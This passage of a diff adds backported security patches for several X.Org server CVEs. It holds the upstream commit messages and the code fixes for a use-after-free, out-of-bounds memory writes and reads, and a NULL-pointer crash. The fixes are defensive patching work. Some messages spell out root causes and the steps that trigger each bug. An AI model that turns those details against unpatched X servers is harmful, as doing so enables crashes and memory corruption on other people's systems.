+-                                  (prop_value->size * size_in_bytes));
++                                  (len * size_in_bytes));
+             break;
+         }
+         if (new_data)
+-- 
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-5380.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-5380.patch
new file mode 100644
index 0000000000..720340d83b
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-5380.patch
@@ -0,0 +1,102 @@
+From 564ccf2ce9616620456102727acb8b0256b7bbd7 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Thu, 5 Oct 2023 12:19:45 +1000
+Subject: [PATCH] mi: reset the PointerWindows reference on screen switch
+
+PointerWindows[] keeps a reference to the last window our sprite
+entered - changes are usually handled by CheckMotion().
+
+If we switch between screens via XWarpPointer our
+dev->spriteInfo->sprite->win is set to the new screen's root window.
+If there's another window at the cursor location CheckMotion() will
+trigger the right enter/leave events later. If there is not, it skips
+that process and we never trigger LeaveWindow() - PointerWindows[] for
+the device still refers to the previous window.
+
+If that window is destroyed we have a dangling reference that will
+eventually cause a use-after-free bug when checking the window hierarchy
+later.
+
+To trigger this, we require:
+- two protocol screens
+- XWarpPointer to the other screen's root window
+- XDestroyWindow before entering any other window
+
+This is a niche bug so we hack around it by making sure we reset the
+PointerWindows[] entry so we cannot have a dangling pointer. This
+doesn't handle Enter/Leave events correctly but the previous code didn't
+either.
+
+CVE-2023-5380, ZDI-CAN-21608
+
+This vulnerability was discovered by:
+Sri working with Trend Micro Zero Day Initiative
+
+Signed-off-by: Peter Hutterer <peter.hutterer@who-t.net>
+Reviewed-by: Adam Jackson <ajax@redhat.com>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/564ccf2ce9616620456102727acb8b0256b7bbd7]
+CVE: CVE-2023-5380
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ dix/enterleave.h   |  2 --
+ include/eventstr.h |  3 +++
+ mi/mipointer.c     | 17 +++++++++++++++--
+ 3 files changed, 18 insertions(+), 4 deletions(-)
+
+diff --git a/dix/enterleave.h b/dix/enterleave.h
+index 4b833d8..e8af924 100644
+--- a/dix/enterleave.h
++++ b/dix/enterleave.h
+@@ -58,8 +58,6 @@ extern void DeviceFocusEvent(DeviceIntPtr dev,
+ 
+ extern void EnterWindow(DeviceIntPtr dev, WindowPtr win, int mode);
+ 
+-extern void LeaveWindow(DeviceIntPtr dev);
+-
+ extern void CoreFocusEvent(DeviceIntPtr kbd,
+                            int type, int mode, int detail, WindowPtr pWin);
+ 
+diff --git a/include/eventstr.h b/include/eventstr.h
+index bf3b95f..2bae3b0 100644
+--- a/include/eventstr.h
++++ b/include/eventstr.h
+@@ -296,4 +296,7 @@ union _InternalEvent {
+ #endif
+ };
+ 
++extern void
++LeaveWindow(DeviceIntPtr dev);
++
+ #endif
+diff --git a/mi/mipointer.c b/mi/mipointer.c
+index 75be1ae..b12ae9b 100644
+--- a/mi/mipointer.c
++++ b/mi/mipointer.c
+@@ -397,8 +397,21 @@ miPointerWarpCursor(DeviceIntPtr pDev, ScreenPtr pScreen, int x, int y)
+ #ifdef PANORAMIX
+         && noPanoramiXExtension
+ #endif
+-        )
+-        UpdateSpriteForScreen(pDev, pScreen);
++        ) {
++            DeviceIntPtr master = GetMaster(pDev, MASTER_POINTER);
++            /* Hack for CVE-2023-5380: if we're moving
++             * screens PointerWindows[] keeps referring to the
++             * old window. If that gets destroyed we have a UAF
++             * bug later. Only happens when jumping from a window
++             * to the root window on the other screen.
++             * Enter/Leave events are incorrect for that case but
++             * too niche to fix.
++             */
++            LeaveWindow(pDev);
++            if (master)
++                LeaveWindow(master);
++            UpdateSpriteForScreen(pDev, pScreen);
++    }
+ }
+ 
+ /**
+-- 
+2.25.1
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6377.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6377.patch
new file mode 100644
index 0000000000..0abd5914fa
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6377.patch
@@ -0,0 +1,79 @@
+From 0c1a93d319558fe3ab2d94f51d174b4f93810afd Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Tue, 28 Nov 2023 15:19:04 +1000
+Subject: [PATCH] Xi: allocate enough XkbActions for our buttons
+
+button->xkb_acts is supposed to be an array sufficiently large for all
+our buttons, not just a single XkbActions struct. Allocating
+insufficient memory here means when we memcpy() later in
+XkbSetDeviceInfo we write into memory that wasn't ours to begin with,
+leading to the usual security ooopsiedaisies.
+
+CVE-2023-6377, ZDI-CAN-22412, ZDI-CAN-22413
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/0c1a93d319558fe3ab2d94f51d174b4f93810afd]
+CVE: CVE-2023-6377
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ Xi/exevents.c | 12 ++++++------
+ dix/devices.c | 10 ++++++++++
+ 2 files changed, 16 insertions(+), 6 deletions(-)
+
+diff --git a/Xi/exevents.c b/Xi/exevents.c
+index dcd4efb3bc..54ea11a938 100644
+--- a/Xi/exevents.c
++++ b/Xi/exevents.c
+@@ -611,13 +611,13 @@ DeepCopyPointerClasses(DeviceIntPtr from, DeviceIntPtr to)
+         }
+ 
+         if (from->button->xkb_acts) {
+-            if (!to->button->xkb_acts) {
+-                to->button->xkb_acts = calloc(1, sizeof(XkbAction));
+-                if (!to->button->xkb_acts)
+-                    FatalError("[Xi] not enough memory for xkb_acts.\n");
+-            }
++            size_t maxbuttons = max(to->button->numButtons, from->button->numButtons);
++            to->button->xkb_acts = xnfreallocarray(to->button->xkb_acts,
++                                                   maxbuttons,
++                                                   sizeof(XkbAction));
++            memset(to->button->xkb_acts, 0, maxbuttons * sizeof(XkbAction));
+             memcpy(to->button->xkb_acts, from->button->xkb_acts,
+-                   sizeof(XkbAction));
++                   from->button->numButtons * sizeof(XkbAction));
+         }
+         else {
+             free(to->button->xkb_acts);
+diff --git a/dix/devices.c b/dix/devices.c
+index b063128df0..3f3224d626 100644
+--- a/dix/devices.c
++++ b/dix/devices.c
+@@ -2539,6 +2539,8 @@ RecalculateMasterButtons(DeviceIntPtr slave)
+ 
+     if (master->button && master->button->numButtons != maxbuttons) {
+         int i;
++        int last_num_buttons = master->button->numButtons;
++
+         DeviceChangedEvent event = {
+             .header = ET_Internal,
+             .type = ET_DeviceChanged,
+@@ -2549,6 +2551,14 @@ RecalculateMasterButtons(DeviceIntPtr slave)
+         };
+ 
+         master->button->numButtons = maxbuttons;
++        if (last_num_buttons < maxbuttons) {
++            master->button->xkb_acts = xnfreallocarray(master->button->xkb_acts,
++                                                       maxbuttons,
++                                                       sizeof(XkbAction));
++            memset(&master->button->xkb_acts[last_num_buttons],
++                   0,
++                   (maxbuttons - last_num_buttons) * sizeof(XkbAction));
++        }
+ 
+         memcpy(&event.buttons.names, master->button->labels, maxbuttons *
+                sizeof(Atom));
+-- 
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6478.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6478.patch
new file mode 100644
index 0000000000..6392eae3f8
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6478.patch
@@ -0,0 +1,63 @@
+From 14f480010a93ff962fef66a16412fafff81ad632 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Mon, 27 Nov 2023 16:27:49 +1000
+Subject: [PATCH] randr: avoid integer truncation in length check of
+ ProcRRChange*Property
+
+Affected are ProcRRChangeProviderProperty and ProcRRChangeOutputProperty.
+See also xserver@8f454b79 where this same bug was fixed for the core
+protocol and XI.
+
+This fixes an OOB read and the resulting information disclosure.
+
+Length calculation for the request was clipped to a 32-bit integer. With
+the correct stuff->nUnits value the expected request size was
+truncated, passing the REQUEST_FIXED_SIZE check.
+
+The server then proceeded with reading at least stuff->num_items bytes
+(depending on stuff->format) from the request and stuffing whatever it
+finds into the property. In the process it would also allocate at least
+stuff->nUnits bytes, i.e. 4GB.
+
+CVE-2023-6478, ZDI-CAN-22561
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/14f480010a93ff962fef66a16412fafff81ad632]
+CVE: CVE-2023-6478
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ randr/rrproperty.c         | 2 +-
+ randr/rrproviderproperty.c | 2 +-
+ 2 files changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/randr/rrproperty.c b/randr/rrproperty.c
+index 25469f57b2..c4fef8a1f6 100644
+--- a/randr/rrproperty.c
++++ b/randr/rrproperty.c
+@@ -530,7 +530,7 @@ ProcRRChangeOutputProperty(ClientPtr client)
+     char format, mode;
+     unsigned long len;
+     int sizeInBytes;
+-    int totalSize;
++    uint64_t totalSize;
+     int err;
+ 
+     REQUEST_AT_LEAST_SIZE(xRRChangeOutputPropertyReq);
+diff --git a/randr/rrproviderproperty.c b/randr/rrproviderproperty.c
+index b79c17f9bf..90c5a9a933 100644
+--- a/randr/rrproviderproperty.c
++++ b/randr/rrproviderproperty.c
+@@ -498,7 +498,7 @@ ProcRRChangeProviderProperty(ClientPtr client)
+     char format, mode;
+     unsigned long len;
+     int sizeInBytes;
+-    int totalSize;
++    uint64_t totalSize;
+     int err;
+ 
+     REQUEST_AT_LEAST_SIZE(xRRChangeProviderPropertyReq);
+-- 
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6816.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6816.patch
new file mode 100644
index 0000000000..0bfff268e7
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2023-6816.patch
@@ -0,0 +1,55 @@
+From 9e2ecb2af8302dedc49cb6a63ebe063c58a9e7e3 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Thu, 14 Dec 2023 11:29:49 +1000
+Subject: [PATCH] dix: allocate enough space for logical button maps
+
+Both DeviceFocusEvent and the XIQueryPointer reply contain a bit for
+each logical button currently down. Since buttons can be arbitrarily mapped
+to anything up to 255 make sure we have enough bits for the maximum mapping.
+
+CVE-2023-6816, ZDI-CAN-22664, ZDI-CAN-22665
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/9e2ecb2af8302dedc49cb6a63ebe063c58a9e7e3]
+CVE: CVE-2023-6816
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ Xi/xiquerypointer.c | 3 +--
+ dix/enterleave.c    | 5 +++--
+ 2 files changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/Xi/xiquerypointer.c b/Xi/xiquerypointer.c
+index 5b77b1a444..2b05ac5f39 100644
+--- a/Xi/xiquerypointer.c
++++ b/Xi/xiquerypointer.c
+@@ -149,8 +149,7 @@ ProcXIQueryPointer(ClientPtr client)
+     if (pDev->button) {
+         int i;
+ 
+-        rep.buttons_len =
+-            bytes_to_int32(bits_to_bytes(pDev->button->numButtons));
++        rep.buttons_len = bytes_to_int32(bits_to_bytes(256)); /* button map up to 255 */
+         rep.length += rep.buttons_len;
+         buttons = calloc(rep.buttons_len, 4);
+         if (!buttons)
+diff --git a/dix/enterleave.c b/dix/enterleave.c
+index 867ec74363..ded8679d76 100644
+--- a/dix/enterleave.c
++++ b/dix/enterleave.c
+@@ -784,8 +784,9 @@ DeviceFocusEvent(DeviceIntPtr dev, int type, int mode, int detail,
+ 
+     mouse = IsFloating(dev) ? dev : GetMaster(dev, MASTER_POINTER);
+ 
+-    /* XI 2 event */
+-    btlen = (mouse->button) ? bits_to_bytes(mouse->button->numButtons) : 0;
++    /* XI 2 event contains the logical button map - maps are CARD8
++     * so we need 256 bits for the possibly maximum mapping */
++    btlen = (mouse->button) ? bits_to_bytes(256) : 0;
+     btlen = bytes_to_int32(btlen);
+     len = sizeof(xXIFocusInEvent) + btlen * 4;
+ 
+-- 
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-1.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-1.patch
new file mode 100644
index 0000000000..80ebc64e59
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-1.patch
@@ -0,0 +1,87 @@
+From ece23be888a93b741aa1209d1dbf64636109d6a5 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Mon, 18 Dec 2023 14:27:50 +1000
+Subject: [PATCH] dix: Allocate sufficient xEvents for our DeviceStateNotify
+
+If a device has both a button class and a key class and numButtons is
+zero, we can get an OOB write due to event under-allocation.
+
+This function seems to assume a device has either keys or buttons, not
+both. It has two virtually identical code paths, both of which assume
+they're applying to the first event in the sequence.
+
+A device with both a key and button class triggered a logic bug - only
+one xEvent was allocated but the deviceStateNotify pointer was pushed on
+once per type. So effectively this logic code:
+
+   int count = 1;
+   if (button && nbuttons > 32) count++;
+   if (key && nbuttons > 0) count++;
+   if (key && nkeys > 32) count++; // this is basically always true
+   // count is at 2 for our keys + zero button device
+
+   ev = alloc(count * sizeof(xEvent));
+   FixDeviceStateNotify(ev);
+   if (button)
+     FixDeviceStateNotify(ev++);
+   if (key)
+     FixDeviceStateNotify(ev++);   // santa drops into the wrong chimney here
+
+If the device has more than 3 valuators, the OOB is pushed back - we're
+off by one so it will happen when the last deviceValuator event is
+written instead.
+
+Fix this by allocating the maximum number of events we may allocate.
+Note that the current behavior is not protocol-correct anyway, this
+patch fixes only the allocation issue.
+
+Note that this issue does not trigger if the device has at least one
+button. While the server does not prevent a button class with zero
+buttons, it is very unlikely.
+
+CVE-2024-0229, ZDI-CAN-22678
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/ece23be888a93b741aa1209d1dbf64636109d6a5]
+CVE: CVE-2024-0229
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ dix/enterleave.c | 6 +++---
+ 1 file changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/dix/enterleave.c b/dix/enterleave.c
+index ded8679d76..17964b00a4 100644
+--- a/dix/enterleave.c
++++ b/dix/enterleave.c
+@@ -675,7 +675,8 @@ static void
+ DeliverStateNotifyEvent(DeviceIntPtr dev, WindowPtr win)
+ {
+     int evcount = 1;
+-    deviceStateNotify *ev, *sev;
++    deviceStateNotify sev[6 + (MAX_VALUATORS + 2)/3];
++    deviceStateNotify *ev;
+     deviceKeyStateNotify *kev;
+     deviceButtonStateNotify *bev;
+ 
+@@ -714,7 +715,7 @@ DeliverStateNotifyEvent(DeviceIntPtr dev, WindowPtr win)
+         }
+     }
+ 
+-    sev = ev = xallocarray(evcount, sizeof(xEvent));
++    ev = sev;
+     FixDeviceStateNotify(dev, ev, NULL, NULL, NULL, first);
+ 
+     if (b != NULL) {
+@@ -770,7 +771,6 @@ DeliverStateNotifyEvent(DeviceIntPtr dev, WindowPtr win)
+ 
+     DeliverEventsToWindow(dev, win, (xEvent *) sev, evcount,
+                           DeviceStateNotifyMask, NullGrab);
+-    free(sev);
+ }
+ 
+ void
+-- 
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-2.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-2.patch
new file mode 100644
index 0000000000..65df74376b
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-2.patch
@@ -0,0 +1,221 @@
+From 219c54b8a3337456ce5270ded6a67bcde53553d5 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Mon, 18 Dec 2023 12:26:20 +1000
+Subject: [PATCH] dix: fix DeviceStateNotify event calculation
+
+The previous code only made sense if one considers buttons and keys to
+be mutually exclusive on a device. That is not necessarily true, causing
+a number of issues.
+
+This function allocates and fills in the number of xEvents we need to
+send the device state down the wire.  This is split across multiple
+32-byte devices including one deviceStateNotify event and optional
+deviceKeyStateNotify, deviceButtonStateNotify and (possibly multiple)
+deviceValuator events.
+
+The previous behavior would instead compose a sequence
+of [state, buttonstate, state, keystate, valuator...]. This is not
+protocol correct, and on top of that made the code extremely convoluted.
+
+Fix this by streamlining: add both button and key into the deviceStateNotify
+and then append the key state and button state, followed by the
+valuators. Finally, the deviceValuator events contain up to 6 valuators
+per event but we only ever sent through 3 at a time. Let's double that
+troughput.
+
+CVE-2024-0229, ZDI-CAN-22678
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/219c54b8a3337456ce5270ded6a67bcde53553d5]
+CVE: CVE-2024-0229
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ dix/enterleave.c | 121 ++++++++++++++++++++---------------------------
+ 1 file changed, 52 insertions(+), 69 deletions(-)
+
+diff --git a/dix/enterleave.c b/dix/enterleave.c
+index 17964b00a4..7b7ba1098b 100644
+--- a/dix/enterleave.c
++++ b/dix/enterleave.c
+@@ -615,9 +615,15 @@ FixDeviceValuator(DeviceIntPtr dev, deviceValuator * ev, ValuatorClassPtr v,
+ 
+     ev->type = DeviceValuator;
+     ev->deviceid = dev->id;
+-    ev->num_valuators = nval < 3 ? nval : 3;
++    ev->num_valuators = nval < 6 ? nval : 6;
+     ev->first_valuator = first;
+     switch (ev->num_valuators) {
++    case 6:
++        ev->valuator2 = v->axisVal[first + 5];
++    case 5:
++        ev->valuator2 = v->axisVal[first + 4];
++    case 4:
++        ev->valuator2 = v->axisVal[first + 3];
+     case 3:
+         ev->valuator2 = v->axisVal[first + 2];
+     case 2:
+@@ -626,7 +632,6 @@ FixDeviceValuator(DeviceIntPtr dev, deviceValuator * ev, ValuatorClassPtr v,
+         ev->valuator0 = v->axisVal[first];
+         break;
+     }
+-    first += ev->num_valuators;
+ }
+ 
+ static void
+@@ -646,7 +651,7 @@ FixDeviceStateNotify(DeviceIntPtr dev, deviceStateNotify * ev, KeyClassPtr k,
+         ev->num_buttons = b->numButtons;
+         memcpy((char *) ev->buttons, (char *) b->down, 4);
+     }
+-    else if (k) {
++    if (k) {
+         ev->classes_reported |= (1 << KeyClass);
+         ev->num_keys = k->xkbInfo->desc->max_key_code -
+             k->xkbInfo->desc->min_key_code;
+@@ -670,15 +675,26 @@ FixDeviceStateNotify(DeviceIntPtr dev, deviceStateNotify * ev, KeyClassPtr k,
+     }
+ }
+ 
+-
++/**
++ * The device state notify event is split across multiple 32-byte events.
++ * The first one contains the first 32 button state bits, the first 32
++ * key state bits, and the first 3 valuator values.
++ *
++ * If a device has more than that, the server sends out:
++ * - one deviceButtonStateNotify for buttons 32 and above
++ * - one deviceKeyStateNotify for keys 32 and above
++ * - one deviceValuator event per 6 valuators above valuator 4
++ *
++ * All events but the last one have the deviceid binary ORed with MORE_EVENTS,
++ */
+ static void
+ DeliverStateNotifyEvent(DeviceIntPtr dev, WindowPtr win)
+ {
++    /* deviceStateNotify, deviceKeyStateNotify, deviceButtonStateNotify
++     * and one deviceValuator for each 6 valuators */
++    deviceStateNotify sev[3 + (MAX_VALUATORS + 6)/6];
+     int evcount = 1;
+-    deviceStateNotify sev[6 + (MAX_VALUATORS + 2)/3];
+-    deviceStateNotify *ev;
+-    deviceKeyStateNotify *kev;
+-    deviceButtonStateNotify *bev;
++    deviceStateNotify *ev = sev;
+ 
+     KeyClassPtr k;
+     ButtonClassPtr b;
+@@ -691,82 +707,49 @@ DeliverStateNotifyEvent(DeviceIntPtr dev, WindowPtr win)
+ 
+     if ((b = dev->button) != NULL) {
+         nbuttons = b->numButtons;
+-        if (nbuttons > 32)
++        if (nbuttons > 32) /* first 32 are encoded in deviceStateNotify */
+             evcount++;
+     }
+     if ((k = dev->key) != NULL) {
+         nkeys = k->xkbInfo->desc->max_key_code - k->xkbInfo->desc->min_key_code;
+-        if (nkeys > 32)
++        if (nkeys > 32) /* first 32 are encoded in deviceStateNotify */
+             evcount++;
+-        if (nbuttons > 0) {
+-            evcount++;
+-        }
+     }
+     if ((v = dev->valuator) != NULL) {
+         nval = v->numAxes;
+-
+-        if (nval > 3)
+-            evcount++;
+-        if (nval > 6) {
+-            if (!(k && b))
+-                evcount++;
+-            if (nval > 9)
+-                evcount += ((nval - 7) / 3);
+-        }
++        /* first three are encoded in deviceStateNotify, then
++         * it's 6 per deviceValuator event */
++        evcount += ((nval - 3) + 6)/6;
+     }
+ 
+-    ev = sev;
+-    FixDeviceStateNotify(dev, ev, NULL, NULL, NULL, first);
+-
+-    if (b != NULL) {
+-        FixDeviceStateNotify(dev, ev++, NULL, b, v, first);
+-        first += 3;
+-        nval -= 3;
+-        if (nbuttons > 32) {
+-            (ev - 1)->deviceid |= MORE_EVENTS;
+-            bev = (deviceButtonStateNotify *) ev++;
+-            bev->type = DeviceButtonStateNotify;
+-            bev->deviceid = dev->id;
+-            memcpy((char *) &bev->buttons[4], (char *) &b->down[4],
+-                   DOWN_LENGTH - 4);
+-        }
+-        if (nval > 0) {
+-            (ev - 1)->deviceid |= MORE_EVENTS;
+-            FixDeviceValuator(dev, (deviceValuator *) ev++, v, first);
+-            first += 3;
+-            nval -= 3;
+-        }
++    BUG_RETURN(evcount <= ARRAY_SIZE(sev));
++
++    FixDeviceStateNotify(dev, ev, k, b, v, first);
++
++    if (b != NULL && nbuttons > 32) {
++        deviceButtonStateNotify *bev = (deviceButtonStateNotify *) ++ev;
++        (ev - 1)->deviceid |= MORE_EVENTS;
++        bev->type = DeviceButtonStateNotify;
++        bev->deviceid = dev->id;
++        memcpy((char *) &bev->buttons[4], (char *) &b->down[4],
++               DOWN_LENGTH - 4);
+     }
+ 
+-    if (k != NULL) {
+-        FixDeviceStateNotify(dev, ev++, k, NULL, v, first);
+-        first += 3;
+-        nval -= 3;
+-        if (nkeys > 32) {
+-            (ev - 1)->deviceid |= MORE_EVENTS;
+-            kev = (deviceKeyStateNotify *) ev++;
+-            kev->type = DeviceKeyStateNotify;
+-            kev->deviceid = dev->id;
+-            memmove((char *) &kev->keys[0], (char *) &k->down[4], 28);
+-        }
+-        if (nval > 0) {
+-            (ev - 1)->deviceid |= MORE_EVENTS;
+-            FixDeviceValuator(dev, (deviceValuator *) ev++, v, first);
+-            first += 3;
+-            nval -= 3;
+-        }
++    if (k != NULL && nkeys > 32) {
++        deviceKeyStateNotify *kev = (deviceKeyStateNotify *) ++ev;
++        (ev - 1)->deviceid |= MORE_EVENTS;
++        kev->type = DeviceKeyStateNotify;
++        kev->deviceid = dev->id;
++        memmove((char *) &kev->keys[0], (char *) &k->down[4], 28);
+     }
+ 
++    first = 3;
++    nval -= 3;
+     while (nval > 0) {
+-        FixDeviceStateNotify(dev, ev++, NULL, NULL, v, first);
+-        first += 3;
+-        nval -= 3;
+-        if (nval > 0) {
+-            (ev - 1)->deviceid |= MORE_EVENTS;
+-            FixDeviceValuator(dev, (deviceValuator *) ev++, v, first);
+-            first += 3;
+-            nval -= 3;
+-        }
++        ev->deviceid |= MORE_EVENTS;
++        FixDeviceValuator(dev, (deviceValuator *) ++ev, v, first);
++        first += 6;
++        nval -= 6;
+     }
+ 
+     DeliverEventsToWindow(dev, win, (xEvent *) sev, evcount,
+-- 
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-3.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-3.patch
new file mode 100644
index 0000000000..742c122fa8
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-3.patch
@@ -0,0 +1,41 @@
+From df3c65706eb169d5938df0052059f3e0d5981b74 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Thu, 21 Dec 2023 13:48:10 +1000
+Subject: [PATCH] Xi: when creating a new ButtonClass, set the number of
+ buttons
+
+There's a racy sequence where a master device may copy the button class
+from the slave, without ever initializing numButtons. This leads to a
+device with zero buttons but a button class which is invalid.
+
+Let's copy the numButtons value from the source - by definition if we
+don't have a button class yet we do not have any other slave devices
+with more than this number of buttons anyway.
+
+CVE-2024-0229, ZDI-CAN-22678
+
+This vulnerability was discovered by:
+Jan-Niklas Sohn working with Trend Micro Zero Day Initiative
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/df3c65706eb169d5938df0052059f3e0d5981b74]
+CVE: CVE-2024-0229
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ Xi/exevents.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+diff --git a/Xi/exevents.c b/Xi/exevents.c
+index 54ea11a938..e161714682 100644
+--- a/Xi/exevents.c
++++ b/Xi/exevents.c
+@@ -605,6 +605,7 @@ DeepCopyPointerClasses(DeviceIntPtr from, DeviceIntPtr to)
+                 to->button = calloc(1, sizeof(ButtonClassRec));
+                 if (!to->button)
+                     FatalError("[Xi] no memory for class shift.\n");
++                to->button->numButtons = from->button->numButtons;
+             }
+             else
+                 classes->button = NULL;
+-- 
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-4.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-4.patch
new file mode 100644
index 0000000000..d1a6214793
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0229-4.patch
@@ -0,0 +1,45 @@
+From 37539cb0bfe4ed96d4499bf371e6b1a474a740fe Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Thu, 21 Dec 2023 14:10:11 +1000
+Subject: [PATCH] Xi: require a pointer and keyboard device for
+ XIAttachToMaster
+
+If we remove a master device and specify which other master devices
+attached slaves should be returned to, enforce that those two are
+indeeed a pointer and a keyboard.
+
+Otherwise we can try to attach the keyboards to pointers and vice versa,
+leading to possible crashes later.
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/37539cb0bfe4ed96d4499bf371e6b1a474a740fe]
+CVE: CVE-2024-0229
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ Xi/xichangehierarchy.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/Xi/xichangehierarchy.c b/Xi/xichangehierarchy.c
+index 504defe566..d2d985848d 100644
+--- a/Xi/xichangehierarchy.c
++++ b/Xi/xichangehierarchy.c
+@@ -270,7 +270,7 @@ remove_master(ClientPtr client, xXIRemoveMasterInfo * r, int flags[MAXDEVICES])
+         if (rc != Success)
+             goto unwind;
+ 
+-        if (!IsMaster(newptr)) {
++        if (!IsMaster(newptr) || !IsPointerDevice(newptr)) {
+             client->errorValue = r->return_pointer;
+             rc = BadDevice;
+             goto unwind;
+@@ -281,7 +281,7 @@ remove_master(ClientPtr client, xXIRemoveMasterInfo * r, int flags[MAXDEVICES])
+         if (rc != Success)
+             goto unwind;
+ 
+-        if (!IsMaster(newkeybd)) {
++        if (!IsMaster(newkeybd) || !IsKeyboardDevice(newkeybd)) {
+             client->errorValue = r->return_keyboard;
+             rc = BadDevice;
+             goto unwind;
+-- 
+GitLab
+
diff --git a/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0408.patch b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0408.patch
new file mode 100644
index 0000000000..c8f75d8a7e
--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-0408.patch
@@ -0,0 +1,64 @@
+From e5e8586a12a3ec915673edffa10dc8fe5e15dac3 Mon Sep 17 00:00:00 2001
+From: Olivier Fourdan <ofourdan@redhat.com>
+Date: Wed, 6 Dec 2023 12:09:41 +0100
+Subject: [PATCH] glx: Call XACE hooks on the GLX buffer
+
+The XSELINUX code will label resources at creation by checking the
+access mode. When the access mode is DixCreateAccess, it will call the
+function to label the new resource SELinuxLabelResource().
+
+However, GLX buffers do not go through the XACE hooks when created,
+hence leaving the resource actually unlabeled.
+
+When, later, the client tries to create another resource using that
+drawable (like a GC for example), the XSELINUX code would try to use
+the security ID of that object which has never been labeled, get a NULL
+pointer and crash when checking whether the requested permissions are
+granted for subject security ID.
+
+To avoid the issue, make sure to call the XACE hooks when creating the
+GLX buffers.
+
+Credit goes to Donn Seeley <donn@xmission.com> for providing the patch.
+
+CVE-2024-0408
+
+Signed-off-by: Olivier Fourdan <ofourdan@redhat.com>
+Acked-by: Peter Hutterer <peter.hutterer@who-t.net>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/e5e8586a12a3ec915673edffa10dc8fe5e15dac3]
+CVE: CVE-2024-0408
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ glx/glxcmds.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/glx/glxcmds.c b/glx/glxcmds.c
